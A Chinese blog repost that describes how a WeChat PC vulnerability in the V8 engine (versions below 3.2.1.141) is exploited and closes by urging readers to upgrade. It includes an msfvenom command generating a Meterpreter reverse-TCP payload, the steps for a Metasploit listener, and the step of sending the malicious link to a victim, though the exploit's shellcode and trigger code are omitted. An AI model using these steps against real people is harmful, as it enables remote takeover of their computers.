Hello!大家好!欢迎来到网络安全情报局,一起跟随网络安全特工走进危机四伏的网络世界。当然大家也可以关注我的公众号:网络安全情报局,更多的网络安全资讯、海量干货以及一些 实用工具等你来解锁!
近期,我们的网络安全特工发现微信存在高危漏洞!只要点击链接,你的电脑就可能被黑客完全控制!下面网络安全情报局为大家揭秘黑客是如何操作的。
注:以下仅供分享,其它违法行为均与作者无关
1、漏洞利用的html,通过html调用JavaScript
<script src = "wa.js"></script>
2、wa.js 这里就不展示恶意部分了
ENABLE_LOG = true;
IN_WORKER = true;
var shellcode = [ ]
·
·
·
try{
print("start running");
trigger();
}catch(e){
print(e);
}
3、使用Kali自带的msfvenom生成反弹木马,并将生成十六进制添加到上面代码的shellcode中
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.65 lport=9999 -f csharp
4、再使用metersploit监听端口,设置本地ip和本地监听端口
5、再使用python开发web服务器
6、将恶意链接发送到微信,并用微信点击打开
7、此时受害者就已经中招了,可以使用screenshot命令获取受害者PC当前画面的截图,可以想做什么就做什么了
看到这里,是不是觉得太恐怖了!
别担心,网络安全特工提醒您:赶紧PC端微信快升级到最新版本!!!
根据腾讯安全中心的公告,这是因为chrome浏览器使用的V8引擎存在安全问题导致的。该漏洞仅影响windows版本的PC版微信,且只影响3.2.1.141以下版本。
原作者:WeyCiu丶
转载自:
https://www.freebuf.com/vuls/270497.html
255
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
